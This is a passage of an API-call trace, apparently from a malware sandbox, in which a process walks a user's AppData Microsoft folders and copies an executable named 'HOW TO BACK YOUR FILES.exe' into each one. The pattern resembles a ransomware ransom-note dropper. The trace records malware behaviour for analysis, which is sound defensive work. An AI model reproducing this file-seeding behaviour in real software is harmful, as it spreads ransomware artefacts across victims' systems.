(normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.046] GetLastError () returned 0x0 [0111.046] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.046] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x4d9d8fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9d8fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.047] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft" [0111.047] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft" [0111.047] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.047] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.047] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.048] GetLastError () returned 0x0 [0111.048] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.048] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d9d8fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9d8fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.048] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar" [0111.049] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar" [0111.049] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.049] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.049] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.050] GetLastError () returned 0x0 [0111.050] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6bc2b9a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bc2b9a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.050] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0111.050] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0111.050] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.050] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.051] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.051] GetLastError () returned 0x0 [0111.052] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d9d8fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9d8fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.052] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media" [0111.052] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media" [0111.052] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.052] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.053] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.053] GetLastError () returned 0x0 [0111.053] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.053] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d9ff140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9ff140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.054] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0" [0111.054] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0" [0111.054] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.054] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.055] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.055] GetLastError () returned 0x0 [0111.055] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.055] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6bc9ddc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bc9ddc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.055] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail" [0111.056] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail" [0111.056] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.056] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.056] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.057] GetLastError () returned 0x0 [0111.057] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6c40e280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6c40e280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.057] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" [0111.057] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" [0111.058] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.058] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.058] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.059] GetLastError () returned 0x0 [0111.059] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.059] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6c6959e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6c6959e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.059] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" [0111.059] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" [0111.059] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.059] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.060] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.060] GetLastError () returned 0x0 [0111.061] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4da4b400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4da4b400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.061] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old" [0111.061] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old" [0111.061] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.061] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.062] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.062] GetLastError () returned 0x0 [0111.062] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.062] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ca27ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ca27ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.063] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio" [0111.063] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio" [0111.063] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.063] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.064] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.064] GetLastError () returned 0x0 [0111.064] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.064] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x962f4540, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x6ca73da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ca73da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.064] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig" [0111.065] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig" [0111.065] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.065] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\taskschedulerconfig\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.065] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 